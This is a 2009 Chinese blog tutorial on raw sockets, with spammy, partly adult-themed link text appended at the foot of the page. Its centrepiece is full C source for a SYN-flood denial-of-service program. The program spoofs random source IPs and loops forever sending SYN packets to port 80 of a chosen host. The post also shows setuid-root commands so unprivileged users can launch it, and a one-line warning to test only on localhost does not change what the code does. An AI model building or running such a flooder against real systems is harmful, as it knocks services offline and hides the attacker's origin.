• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            <2025年5月>
            27282930123
            45678910
            11121314151617
            18192021222324
            25262728293031
            1234567

            統(tǒng)計

            • 隨筆 - 4
            • 文章 - 0
            • 評論 - 2
            • 引用 - 0

            常用鏈接

            留言簿(1)

            隨筆檔案

            搜索

            •  

            最新評論

            閱讀排行榜

            評論排行榜

            原始套接字

            原始套接字
                 我們在前面已經(jīng)學(xué)習(xí)過了網(wǎng)絡(luò)程序的兩種套接字(SOCK_STREAM,SOCK_DRAGM).在這一章 里面我們一起來學(xué)習(xí)另外一種套接字--原始套接字(SOCK_RAW). 應(yīng)用原始套接字,我們可以編寫出由TCP和UDP套接字不能夠?qū)崿F(xiàn)的功能. 注意原始套接字只能夠由有root權(quán)限的人創(chuàng)建.

            10.1 原始套接字的創(chuàng)建

            int sockfd(AF_INET,SOCK_RAW,protocol)

            可以創(chuàng)建一個原始套接字.根據(jù)協(xié)議的類型不同我們可以創(chuàng)建不同類型的原始套接字 比如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.詳細的情況查看 下面我們以一個實例來說明原始套接字的創(chuàng)建和使用

            10.2 一個原始套接字的實例
            還記得DOS是什么意思嗎?在這里我們就一起來編寫一個實現(xiàn)DOS的小程序. 下面是程序的源代碼

            /********************   DOS.c                *****************/
            #include
            #include
            #include
            #include
            #include
            #include
            #include
            #include
            #include

            #define DESTPORT         80        /* 要攻擊的端口(WEB)       */
            #define LOCALPORT        8888

            void send_tcp(int sockfd,struct sockaddr_in *addr);
            unsigned short check_sum(unsigned short *addr,int len);

            int main(int argc,char **argv)
            {
            int sockfd;
            struct sockaddr_in addr;
            struct hostent *host;
            int on=1;

            if(argc!=2)
            {
                     fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
                     exit(1);
            }

            bzero(&addr,sizeof(struct sockaddr_in));
            addr.sin_family=AF_INET;
            addr.sin_port=htons(DESTPORT);

            if(inet_aton(argv[1],&addr.sin_addr)==0)
            {
                     host=gethostbyname(argv[1]);
                     if(host==NULL)
                     {
                             fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
                             exit(1);
                     }
                     addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
            }

            /**** 使用IPPROTO_TCP創(chuàng)建一個TCP的原始套接字     ****/

            sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
            if(sockfd<0)
            {
                     fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
                     exit(1);
            }
            /********   設(shè)置IP數(shù)據(jù)包格式,告訴系統(tǒng)內(nèi)核模塊IP數(shù)據(jù)包由我們自己來填寫   ***/

            setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));

            /****   沒有辦法,只用超級護用戶才可以使用原始套接字     *********/
            setuid(getpid());

            /*********   發(fā)送炸彈了!!!!           ****/
            send_tcp(sockfd,&addr);
            }



            /*******   發(fā)送炸彈的實現(xiàn)    *********/
            void send_tcp(int sockfd,struct sockaddr_in *addr)
            {
            char buffer[100];   /**** 用來放置我們的數(shù)據(jù)包   ****/
            struct ip *ip;
            struct tcphdr *tcp;
            int head_len;

            /******* 我們的數(shù)據(jù)包實際上沒有任何內(nèi)容,所以長度就是兩個結(jié)構(gòu)的長度   ***/

            head_len=sizeof(struct ip)+sizeof(struct tcphdr);

            bzero(buffer,100);

            /********   填充IP數(shù)據(jù)包的頭部,還記得IP的頭格式嗎?      ******/
            ip=(struct ip *)buffer;
            ip->ip_v=IPVERSION;              /** 版本一般的是 4       **/
            ip->ip_hl=sizeof(struct ip)>>2; /** IP數(shù)據(jù)包的頭部長度   **/
            ip->ip_tos=0;                    /** 服務(wù)類型             **/
            ip->ip_len=htons(head_len);      /** IP數(shù)據(jù)包的長度       **/
            ip->ip_id=0;                     /** 讓系統(tǒng)去填寫吧       **/
            ip->ip_off=0;                    /** 和上面一樣,省點時間 **/        
            ip->ip_ttl=MAXTTL;               /** 最長的時間    255     **/
            ip->ip_p=IPPROTO_TCP;            /** 我們要發(fā)的是 TCP包   **/
            ip->ip_sum=0;                    /** 校驗和讓系統(tǒng)去做     **/
            ip->ip_dst=addr->sin_addr;       /** 我們攻擊的對象       **/

            /*******   開始填寫TCP數(shù)據(jù)包                            *****/
            tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
            tcp->source=htons(LOCALPORT);
            tcp->dest=addr->sin_port;            /** 目的端口     **/
            tcp->seq=random();
            tcp->ack_seq=0;
            tcp->doff=5;
            tcp->syn=1;                         /** 我要建立連接 **/
            tcp->check=0;


            /** 好了,一切都準備好了.服務(wù)器,你準備好了沒有?? ^_^   **/
            while(1)
               {
            /**   你不知道我是從那里來的,慢慢的去等吧!       **/
                 ip->ip_src.s_addr=random();     

            /** 什么都讓系統(tǒng)做了,也沒有多大的意思,還是讓我們自己來校驗頭部吧 */
            /**             下面這條可有可無     */
                 tcp->check=check_sum((unsigned short *)tcp,
                             sizeof(struct tcphdr));
                 sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
               }
            }

            /* 下面是首部校驗和的算法,偷了別人的 */
            unsigned short check_sum(unsigned short *addr,int len)
            {
            register int nleft=len;
            register int sum=0;
            register short *w=addr;
               short answer=0;

            while(nleft>1)
            {
               sum+=*w++;
               nleft-=2;
            }
            if(nleft==1)
            {
               *(unsigned char *)(&answer)=*(unsigned char *)w;
               sum+=answer;
            }
              
            sum=(sum>>16)+(sum&0xffff);
            sum+=(sum>>16);
            answer=~sum;
            return(answer);
            }

            編譯一下,拿localhost做一下實驗,看看有什么結(jié)果.(千萬不要試別人的啊). 為了讓普通用戶可以運行這個程序,我們應(yīng)該將這個程序的所有者變?yōu)閞oot,且 設(shè)置setuid位

            [root@hoyt /root]#chown root DOS
            [root@hoyt /root]#chmod +s DOS


            10.3 總結(jié)
            原始套接字和一般的套接字不同的是以前許多由系統(tǒng)做的事情,現(xiàn)在要由我們自己來做了. 不過這里面是不是有很多的樂趣呢. 當我們創(chuàng)建了一個TCP套接字的時候,我們只是負責(zé)把我們要發(fā)送的內(nèi)容(buffer)傳遞給了系統(tǒng). 系統(tǒng)在收到我們的數(shù)據(jù)后,回自動的調(diào)用相應(yīng)的模塊給數(shù)據(jù)加上TCP頭部,然后加上IP頭部. 再發(fā)送出去.而現(xiàn)在是我們自己創(chuàng)建各個的頭部,系統(tǒng)只是把它們發(fā)送出去. 在上面的實例中,由于我們要修改我們的源IP地址,所以我們使用了setsockopt函數(shù),如果我們只是修改TCP數(shù)據(jù),那么IP數(shù)據(jù)一樣也可以由系統(tǒng)來創(chuàng)建的.

            posted on 2009-04-26 18:24 梁少林 閱讀(861) 評論(1)  編輯 收藏 引用

            評論

            # re: 原始套接字 2009-04-28 00:40 shongbee2

            哈哈,學(xué)習(xí)了。謝謝。
              回復(fù)  更多評論    

            只有注冊用戶登錄后才能發(fā)表評論。
            網(wǎng)站導(dǎo)航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


            性做久久久久久久久老女人| 久久天天躁狠狠躁夜夜躁2O2O| 久久青青草原国产精品免费| 青青国产成人久久91网| 久久久不卡国产精品一区二区| 久久国产精品偷99| 久久综合亚洲鲁鲁五月天| 久久精品亚洲日本波多野结衣 | 99久久99久久久精品齐齐| 成人综合伊人五月婷久久| 久久电影网| MM131亚洲国产美女久久| 亚洲欧美久久久久9999| 国内精品久久久久影院优| 久久婷婷五月综合色99啪ak| 欧美噜噜久久久XXX| 久久福利片| 久久青草国产手机看片福利盒子 | 久久久久久精品无码人妻| 久久综合给久久狠狠97色| 久久久亚洲精品蜜桃臀| 97久久久精品综合88久久| 久久久久久久精品妇女99| 久久99热这里只有精品国产| av午夜福利一片免费看久久| 亚洲国产日韩欧美综合久久| 国产精自产拍久久久久久蜜| 精品综合久久久久久888蜜芽| 久久天天躁狠狠躁夜夜不卡| 久久久久97国产精华液好用吗| 色综合久久精品中文字幕首页| 亚洲精品白浆高清久久久久久| 久久久久久免费视频| 欧美精品丝袜久久久中文字幕 | 精品久久久无码人妻中文字幕豆芽 | 欧美激情精品久久久久久久| 精品久久久无码中文字幕天天| 青青草原1769久久免费播放| 成人免费网站久久久| 久久精品国产亚洲77777| 成人国内精品久久久久一区|